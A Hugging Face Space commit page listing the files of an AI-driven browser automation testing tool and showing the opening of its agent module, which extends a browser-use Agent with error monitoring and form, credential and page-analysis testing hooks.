Spaces:
Running
Running
Upload folder using huggingface_hub
Browse files- src/__init__.py +0 -0
- src/agent/__init__.py +0 -0
- src/agent/browser_use/browser_use_agent.py +786 -0
- src/agent/deep_research/deep_research_agent.py +1276 -0
- src/browser/__init__.py +0 -0
- src/browser/custom_browser.py +120 -0
- src/browser/custom_context.py +33 -0
- src/controller/__init__.py +0 -0
- src/controller/custom_controller.py +193 -0
- src/utils/__init__.py +0 -0
- src/utils/advanced_error_handler.py +450 -0
- src/utils/advanced_testing.py +1015 -0
- src/utils/ai_thinking_engine.py +437 -0
- src/utils/config.py +111 -0
- src/utils/credential_manager.py +628 -0
- src/utils/enhanced_ai_testing.py +635 -0
- src/utils/error_monitor.py +615 -0
- src/utils/html_report_generator.py +212 -0
- src/utils/intelligent_form_testing.py +1096 -0
- src/utils/llm_provider.py +366 -0
- src/utils/mcp_client.py +254 -0
- src/utils/pdf_report_generator.py +736 -0
- src/utils/screenshot_capture.py +287 -0
- src/utils/site_audit.py +144 -0
- src/utils/utils.py +50 -0
- src/webui/__init__.py +0 -0
- src/webui/components/__init__.py +0 -0
- src/webui/components/agent_settings_tab.py +241 -0
- src/webui/components/browser_settings_tab.py +181 -0
- src/webui/components/browser_use_agent_tab.py +1299 -0
- src/webui/components/deep_research_agent_tab.py +457 -0
- src/webui/interface.py +179 -0
- src/webui/webui_manager.py +146 -0
src/__init__.py
ADDED
|
File without changes
|
src/agent/__init__.py
ADDED
|
File without changes
|
src/agent/browser_use/browser_use_agent.py
ADDED
|
@@ -0,0 +1,786 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Browser Use Agent
|
| 3 |
+
=============================================================
|
| 4 |
+
|
| 5 |
+
Advanced browser automation agent for comprehensive website testing.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
from __future__ import annotations
|
| 13 |
+
|
| 14 |
+
import asyncio
|
| 15 |
+
import logging
|
| 16 |
+
import os
|
| 17 |
+
|
| 18 |
+
# Disable telemetry
|
| 19 |
+
os.environ["BROWSER_USE_TELEMETRY"] = "false"
|
| 20 |
+
os.environ["BROWSER_USE_DISABLE_TELEMETRY"] = "true"
|
| 21 |
+
|
| 22 |
+
# from lmnr.sdk.decorators import observe
|
| 23 |
+
from browser_use.agent.gif import create_history_gif
|
| 24 |
+
from browser_use.agent.service import Agent, AgentHookFunc
|
| 25 |
+
from browser_use.agent.views import (
|
| 26 |
+
ActionResult,
|
| 27 |
+
AgentHistory,
|
| 28 |
+
AgentHistoryList,
|
| 29 |
+
AgentStepInfo,
|
| 30 |
+
ToolCallingMethod,
|
| 31 |
+
)
|
| 32 |
+
from browser_use.browser.views import BrowserStateHistory
|
| 33 |
+
from browser_use.utils import time_execution_async
|
| 34 |
+
from dotenv import load_dotenv
|
| 35 |
+
from browser_use.agent.message_manager.utils import is_model_without_tool_support
|
| 36 |
+
from src.utils.screenshot_capture import screenshot_capture
|
| 37 |
+
from src.utils.advanced_testing import advanced_testing_engine
|
| 38 |
+
from src.utils.enhanced_ai_testing import enhanced_ai_testing_engine
|
| 39 |
+
from src.utils.error_monitor import error_monitor
|
| 40 |
+
from src.utils.intelligent_form_testing import IntelligentFormTester
|
| 41 |
+
from src.utils.ai_thinking_engine import AIThinkingEngine
|
| 42 |
+
from src.utils.credential_manager import CredentialManager
|
| 43 |
+
from datetime import datetime
|
| 44 |
+
import json
|
| 45 |
+
|
| 46 |
+
load_dotenv()
|
| 47 |
+
logger = logging.getLogger(__name__)
|
| 48 |
+
|
| 49 |
+
# Truthy parse of the SKIP_LLM_API_KEY_VERIFICATION env var: any value whose
# first character is "t", "y" or "1" (e.g. "true", "yes", "1") enables the
# skip. Using [:1] instead of [0] avoids an IndexError when the variable is
# set but empty ("" -> disabled), which the original code would crash on.
SKIP_LLM_API_KEY_VERIFICATION = (
    os.environ.get("SKIP_LLM_API_KEY_VERIFICATION", "false").lower()[:1]
    in ("t", "y", "1")
)
|
| 52 |
+
|
| 53 |
+
|
| 54 |
+
class BrowserUseAgent(Agent):
    """browser-use Agent extended with error monitoring and AI-driven testing.

    Adds an error monitor, an enhanced AI testing engine, and three lazily
    created collaborators (form tester, thinking engine, credential manager)
    that are populated by ``initialize_intelligent_testing``.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Module-level singletons shared by all agent instances.
        self.error_monitor = error_monitor
        self.enhanced_ai_testing_engine = enhanced_ai_testing_engine
        # Created on demand in initialize_intelligent_testing(); None until then.
        self.intelligent_form_tester = None
        self.ai_thinking_engine = None
        self.credential_manager = None
        # Master switch; flipped off if component initialisation fails.
        self.intelligent_testing_enabled = True
|
| 66 |
+
|
| 67 |
+
def _set_tool_calling_method(self) -> ToolCallingMethod | None:
|
| 68 |
+
tool_calling_method = self.settings.tool_calling_method
|
| 69 |
+
if tool_calling_method == 'auto':
|
| 70 |
+
if is_model_without_tool_support(self.model_name):
|
| 71 |
+
return 'raw'
|
| 72 |
+
elif self.chat_model_library == 'ChatGoogleGenerativeAI':
|
| 73 |
+
return None
|
| 74 |
+
elif self.chat_model_library == 'ChatOpenAI':
|
| 75 |
+
return 'function_calling'
|
| 76 |
+
elif self.chat_model_library == 'AzureChatOpenAI':
|
| 77 |
+
return 'function_calling'
|
| 78 |
+
else:
|
| 79 |
+
return None
|
| 80 |
+
else:
|
| 81 |
+
return tool_calling_method
|
| 82 |
+
|
| 83 |
+
    @time_execution_async("--run (agent)")
    async def run(
        self, max_steps: int = 100, on_step_start: AgentHookFunc | None = None,
        on_step_end: AgentHookFunc | None = None
    ) -> AgentHistoryList:
        """Execute the task with maximum number of steps.

        Args:
            max_steps: Upper bound on agent steps before giving up.
            on_step_start: Optional async hook awaited before each step.
            on_step_end: Optional async hook awaited after each step.

        Returns:
            The accumulated AgentHistoryList, even on interrupt or failure.
        """

        loop = asyncio.get_event_loop()

        # Set up the Ctrl+C signal handler with callbacks specific to this agent
        from browser_use.utils import SignalHandler

        signal_handler = SignalHandler(
            loop=loop,
            pause_callback=self.pause,
            resume_callback=self.resume,
            custom_exit_callback=None,  # No special cleanup needed on forced exit
            exit_on_second_int=True,
        )
        signal_handler.register()

        try:
            self._log_agent_run()

            # Start error monitoring. Page acquisition is best-effort: failures
            # are logged but never abort the run.
            if hasattr(self, 'browser_context') and self.browser_context:
                try:
                    # Use the correct method to get a page from browser context
                    if hasattr(self.browser_context, 'new_page'):
                        page = await self.browser_context.new_page()
                    elif hasattr(self.browser_context, 'pages') and self.browser_context.pages:
                        page = self.browser_context.pages[0]
                    else:
                        # Try to get page from browser state
                        if hasattr(self.state, 'browser_state') and self.state.browser_state:
                            page = self.state.browser_state.current_page
                        else:
                            page = None

                    if page:
                        await self.error_monitor.start_monitoring(page)
                        logger.info("🔍 Error monitoring started")
                    else:
                        logger.warning("Could not get page for error monitoring")
                except Exception as e:
                    logger.warning(f"Failed to start error monitoring: {e}")

            # Execute initial actions if provided
            if self.initial_actions:
                result = await self.multi_act(self.initial_actions, check_for_new_elements=False)
                self.state.last_result = result

            for step in range(max_steps):
                # Check if waiting for user input after Ctrl+C
                if self.state.paused:
                    signal_handler.wait_for_resume()
                    signal_handler.reset()

                # Check if we should stop due to too many failures
                if self.state.consecutive_failures >= self.settings.max_failures:
                    logger.error(f'❌ Stopping due to {self.settings.max_failures} consecutive failures')
                    break

                # Check control flags before each step
                if self.state.stopped:
                    logger.info('Agent stopped')
                    break

                # Busy-wait (with a short sleep) while paused; a stop request
                # breaks out of the wait loop only — the step still runs after.
                # NOTE(review): a stop while paused does not skip this step;
                # confirm that is intended.
                while self.state.paused:
                    await asyncio.sleep(0.2)  # Small delay to prevent CPU spinning
                    if self.state.stopped:  # Allow stopping while paused
                        break

                if on_step_start is not None:
                    await on_step_start(self)

                step_info = AgentStepInfo(step_number=step, max_steps=max_steps)
                await self.step(step_info)

                if on_step_end is not None:
                    await on_step_end(self)

                if self.state.history.is_done():
                    # Optionally re-validate the output before declaring done;
                    # a failed validation re-enters the loop for another step.
                    if self.settings.validate_output and step < max_steps - 1:
                        if not await self._validate_output():
                            continue

                    await self.log_completion()
                    break
            else:
                # for-else: executes only when the loop exhausted max_steps
                # without a break, i.e. the task never completed.
                error_message = 'Failed to complete task in maximum steps'

                self.state.history.history.append(
                    AgentHistory(
                        model_output=None,
                        result=[ActionResult(error=error_message, include_in_memory=True)],
                        state=BrowserStateHistory(
                            url='',
                            title='',
                            tabs=[],
                            interacted_element=[],
                            screenshot=None,
                        ),
                        metadata=None,
                    )
                )

                logger.info(f'❌ {error_message}')

            return self.state.history

        except KeyboardInterrupt:
            # Already handled by our signal handler, but catch any direct KeyboardInterrupt as well
            logger.info('Got KeyboardInterrupt during execution, returning current history')
            return self.state.history

        finally:
            # Unregister signal handlers before cleanup
            signal_handler.unregister()

            if self.settings.save_playwright_script_path:
                logger.info(
                    f'Agent run finished. Attempting to save Playwright script to: {self.settings.save_playwright_script_path}'
                )
                try:
                    # Extract sensitive data keys if sensitive_data is provided
                    keys = list(self.sensitive_data.keys()) if self.sensitive_data else None
                    # Pass browser and context config to the saving method
                    self.state.history.save_as_playwright_script(
                        self.settings.save_playwright_script_path,
                        sensitive_data_keys=keys,
                        browser_config=self.browser.config,
                        context_config=self.browser_context.config,
                    )
                except Exception as script_gen_err:
                    # Log any error during script generation/saving
                    logger.error(f'Failed to save Playwright script: {script_gen_err}', exc_info=True)

            await self.close()

            if self.settings.generate_gif:
                output_path: str = 'agent_history.gif'
                if isinstance(self.settings.generate_gif, str):
                    output_path = self.settings.generate_gif

                create_history_gif(task=self.task, history=self.state.history, output_path=output_path)

            # PDF report generation disabled per project settings
            # (the called method is a logged no-op; see _generate_automated_pdf_report)
            await self._generate_automated_pdf_report()

            # Stop error monitoring
            try:
                if hasattr(self, 'error_monitor') and self.error_monitor:
                    await self.error_monitor.stop_monitoring()
                    logger.info("🛑 Error monitoring stopped")
            except Exception as e:
                logger.warning(f"Failed to stop error monitoring: {e}")
|
| 240 |
+
|
| 241 |
+
async def initialize_intelligent_testing(self):
|
| 242 |
+
"""Initialize intelligent testing components."""
|
| 243 |
+
try:
|
| 244 |
+
if not self.intelligent_testing_enabled:
|
| 245 |
+
return
|
| 246 |
+
|
| 247 |
+
logger.info("🧠 Initializing intelligent testing components...")
|
| 248 |
+
|
| 249 |
+
# Initialize AI thinking engine
|
| 250 |
+
self.ai_thinking_engine = AIThinkingEngine(
|
| 251 |
+
llm=self.chat_model,
|
| 252 |
+
page=self.browser_context.page
|
| 253 |
+
)
|
| 254 |
+
|
| 255 |
+
# Initialize intelligent form tester
|
| 256 |
+
self.intelligent_form_tester = IntelligentFormTester(
|
| 257 |
+
llm=self.chat_model,
|
| 258 |
+
page=self.browser_context.page
|
| 259 |
+
)
|
| 260 |
+
|
| 261 |
+
# Initialize credential manager
|
| 262 |
+
self.credential_manager = CredentialManager(
|
| 263 |
+
page=self.browser_context.page
|
| 264 |
+
)
|
| 265 |
+
|
| 266 |
+
logger.info("✅ Intelligent testing components initialized")
|
| 267 |
+
|
| 268 |
+
except Exception as e:
|
| 269 |
+
logger.error(f"❌ Error initializing intelligent testing: {e}")
|
| 270 |
+
self.intelligent_testing_enabled = False
|
| 271 |
+
|
| 272 |
+
async def run_intelligent_form_testing(self) -> Dict[str, Any]:
|
| 273 |
+
"""Run intelligent form testing with comprehensive scenarios."""
|
| 274 |
+
try:
|
| 275 |
+
if not self.intelligent_testing_enabled or not self.intelligent_form_tester:
|
| 276 |
+
logger.warning("⚠️ Intelligent form testing not available")
|
| 277 |
+
return {"error": "Intelligent form testing not available"}
|
| 278 |
+
|
| 279 |
+
logger.info("🚀 Starting intelligent form testing...")
|
| 280 |
+
|
| 281 |
+
# Discover form fields
|
| 282 |
+
form_fields = await self.intelligent_form_tester.discover_form_fields()
|
| 283 |
+
|
| 284 |
+
if not form_fields:
|
| 285 |
+
logger.warning("⚠️ No form fields found on the page")
|
| 286 |
+
return {"error": "No form fields found"}
|
| 287 |
+
|
| 288 |
+
# Generate test scenarios
|
| 289 |
+
test_scenarios = await self.intelligent_form_tester.generate_test_scenarios()
|
| 290 |
+
|
| 291 |
+
# Execute test scenarios
|
| 292 |
+
test_results = await self.intelligent_form_tester.execute_test_scenarios(test_scenarios)
|
| 293 |
+
|
| 294 |
+
# Generate comprehensive report
|
| 295 |
+
report = await self.intelligent_form_tester.generate_comprehensive_report()
|
| 296 |
+
|
| 297 |
+
# Add detailed error report
|
| 298 |
+
error_report = self.intelligent_form_tester.get_detailed_error_report()
|
| 299 |
+
report["detailed_error_analysis"] = error_report
|
| 300 |
+
|
| 301 |
+
logger.info(f"✅ Intelligent form testing complete: {len(test_results)} tests executed")
|
| 302 |
+
return report
|
| 303 |
+
|
| 304 |
+
except Exception as e:
|
| 305 |
+
logger.error(f"❌ Error in intelligent form testing: {e}")
|
| 306 |
+
return {"error": str(e)}
|
| 307 |
+
|
| 308 |
+
async def run_intelligent_credential_testing(self) -> Dict[str, Any]:
|
| 309 |
+
"""Run intelligent credential testing with various scenarios."""
|
| 310 |
+
try:
|
| 311 |
+
if not self.intelligent_testing_enabled or not self.credential_manager:
|
| 312 |
+
logger.warning("⚠️ Intelligent credential testing not available")
|
| 313 |
+
return {"error": "Intelligent credential testing not available"}
|
| 314 |
+
|
| 315 |
+
logger.info("🔐 Starting intelligent credential testing...")
|
| 316 |
+
|
| 317 |
+
# Run comprehensive credential testing
|
| 318 |
+
report = await self.credential_manager.run_comprehensive_credential_testing()
|
| 319 |
+
|
| 320 |
+
logger.info("✅ Intelligent credential testing complete")
|
| 321 |
+
return report
|
| 322 |
+
|
| 323 |
+
except Exception as e:
|
| 324 |
+
logger.error(f"❌ Error in intelligent credential testing: {e}")
|
| 325 |
+
return {"error": str(e)}
|
| 326 |
+
|
| 327 |
+
async def run_ai_thinking_analysis(self) -> Dict[str, Any]:
|
| 328 |
+
"""Run AI thinking analysis of the current page."""
|
| 329 |
+
try:
|
| 330 |
+
if not self.intelligent_testing_enabled or not self.ai_thinking_engine:
|
| 331 |
+
logger.warning("⚠️ AI thinking analysis not available")
|
| 332 |
+
return {"error": "AI thinking analysis not available"}
|
| 333 |
+
|
| 334 |
+
logger.info("🤔 Starting AI thinking analysis...")
|
| 335 |
+
|
| 336 |
+
# Analyze the page intelligently
|
| 337 |
+
page_analysis = await self.ai_thinking_engine.analyze_page_intelligence()
|
| 338 |
+
|
| 339 |
+
# Generate testing strategy
|
| 340 |
+
testing_strategy = await self.ai_thinking_engine.generate_testing_strategy(page_analysis)
|
| 341 |
+
|
| 342 |
+
# Get thinking summary
|
| 343 |
+
thinking_summary = self.ai_thinking_engine.get_thinking_summary()
|
| 344 |
+
|
| 345 |
+
analysis_result = {
|
| 346 |
+
"page_analysis": page_analysis,
|
| 347 |
+
"testing_strategy": {
|
| 348 |
+
"approach": testing_strategy.approach,
|
| 349 |
+
"priority_order": testing_strategy.priority_order,
|
| 350 |
+
"focus_areas": testing_strategy.focus_areas,
|
| 351 |
+
"risk_assessment": testing_strategy.risk_assessment,
|
| 352 |
+
"estimated_duration": testing_strategy.estimated_duration,
|
| 353 |
+
"reasoning": testing_strategy.reasoning
|
| 354 |
+
},
|
| 355 |
+
"thinking_summary": thinking_summary
|
| 356 |
+
}
|
| 357 |
+
|
| 358 |
+
logger.info("✅ AI thinking analysis complete")
|
| 359 |
+
return analysis_result
|
| 360 |
+
|
| 361 |
+
except Exception as e:
|
| 362 |
+
logger.error(f"❌ Error in AI thinking analysis: {e}")
|
| 363 |
+
return {"error": str(e)}
|
| 364 |
+
|
| 365 |
+
async def run_comprehensive_intelligent_testing(self) -> Dict[str, Any]:
|
| 366 |
+
"""Run comprehensive intelligent testing combining all features."""
|
| 367 |
+
try:
|
| 368 |
+
if not self.intelligent_testing_enabled:
|
| 369 |
+
logger.warning("⚠️ Intelligent testing not enabled")
|
| 370 |
+
return {"error": "Intelligent testing not enabled"}
|
| 371 |
+
|
| 372 |
+
logger.info("🎯 Starting comprehensive intelligent testing...")
|
| 373 |
+
|
| 374 |
+
# Initialize intelligent testing components
|
| 375 |
+
await self.initialize_intelligent_testing()
|
| 376 |
+
|
| 377 |
+
# Run AI thinking analysis
|
| 378 |
+
ai_analysis = await self.run_ai_thinking_analysis()
|
| 379 |
+
|
| 380 |
+
# Run intelligent form testing
|
| 381 |
+
form_testing = await self.run_intelligent_form_testing()
|
| 382 |
+
|
| 383 |
+
# Run intelligent credential testing
|
| 384 |
+
credential_testing = await self.run_intelligent_credential_testing()
|
| 385 |
+
|
| 386 |
+
# Combine all results
|
| 387 |
+
comprehensive_result = {
|
| 388 |
+
"ai_analysis": ai_analysis,
|
| 389 |
+
"form_testing": form_testing,
|
| 390 |
+
"credential_testing": credential_testing,
|
| 391 |
+
"timestamp": datetime.now().isoformat(),
|
| 392 |
+
"summary": {
|
| 393 |
+
"ai_analysis_success": "error" not in ai_analysis,
|
| 394 |
+
"form_testing_success": "error" not in form_testing,
|
| 395 |
+
"credential_testing_success": "error" not in credential_testing
|
| 396 |
+
}
|
| 397 |
+
}
|
| 398 |
+
|
| 399 |
+
logger.info("✅ Comprehensive intelligent testing complete")
|
| 400 |
+
return comprehensive_result
|
| 401 |
+
|
| 402 |
+
except Exception as e:
|
| 403 |
+
logger.error(f"❌ Error in comprehensive intelligent testing: {e}")
|
| 404 |
+
return {"error": str(e)}
|
| 405 |
+
|
| 406 |
+
async def _generate_automated_pdf_report(self):
|
| 407 |
+
"""PDF report generation disabled."""
|
| 408 |
+
logger.info("📊 PDF report generation is disabled. Skipping.")
|
| 409 |
+
|
| 410 |
+
async def _prepare_test_data_for_report(self):
|
| 411 |
+
"""Prepare test data from execution history for PDF report."""
|
| 412 |
+
try:
|
| 413 |
+
logger.info("🔍 Starting test data preparation...")
|
| 414 |
+
|
| 415 |
+
# Debug: Log the history structure
|
| 416 |
+
logger.info(f"History type: {type(self.state.history)}")
|
| 417 |
+
|
| 418 |
+
# Check if state exists
|
| 419 |
+
if not hasattr(self, 'state') or not self.state:
|
| 420 |
+
logger.error("❌ No state found in agent")
|
| 421 |
+
raise Exception("No state found in agent")
|
| 422 |
+
|
| 423 |
+
# Check if history exists
|
| 424 |
+
if not hasattr(self.state, 'history') or not self.state.history:
|
| 425 |
+
logger.error("❌ No history found in state")
|
| 426 |
+
raise Exception("No history found in state")
|
| 427 |
+
|
| 428 |
+
# Access steps correctly from AgentHistoryList
|
| 429 |
+
# AgentHistoryList is iterable, so we can convert it to a list
|
| 430 |
+
steps = list(self.state.history)
|
| 431 |
+
|
| 432 |
+
logger.info(f"Steps type: {type(steps)}")
|
| 433 |
+
logger.info(f"Number of steps: {len(steps)}")
|
| 434 |
+
|
| 435 |
+
# Debug: Log first few steps to understand structure
|
| 436 |
+
if steps:
|
| 437 |
+
logger.info(f"First step type: {type(steps[0])}")
|
| 438 |
+
logger.info(f"First step attributes: {dir(steps[0])}")
|
| 439 |
+
if hasattr(steps[0], 'action'):
|
| 440 |
+
logger.info(f"First step action: {steps[0].action}")
|
| 441 |
+
if hasattr(steps[0], 'result'):
|
| 442 |
+
logger.info(f"First step result: {steps[0].result}")
|
| 443 |
+
|
| 444 |
+
# Log all steps for debugging
|
| 445 |
+
for i, step in enumerate(steps[:5]): # Log first 5 steps
|
| 446 |
+
logger.info(f"Step {i+1}: {type(step)} - {getattr(step, 'action', 'No action')}")
|
| 447 |
+
|
| 448 |
+
# Get execution statistics
|
| 449 |
+
total_steps = len(steps)
|
| 450 |
+
successful_steps = 0
|
| 451 |
+
failed_steps = 0
|
| 452 |
+
|
| 453 |
+
# Count successful and failed steps
|
| 454 |
+
for step in steps:
|
| 455 |
+
if hasattr(step, 'result') and step.result:
|
| 456 |
+
if step.result.success:
|
| 457 |
+
successful_steps += 1
|
| 458 |
+
else:
|
| 459 |
+
failed_steps += 1
|
| 460 |
+
else:
|
| 461 |
+
# If no result or success field, consider it successful
|
| 462 |
+
successful_steps += 1
|
| 463 |
+
|
| 464 |
+
# Calculate success rate
|
| 465 |
+
success_rate = (successful_steps / total_steps * 100) if total_steps > 0 else 0
|
| 466 |
+
|
| 467 |
+
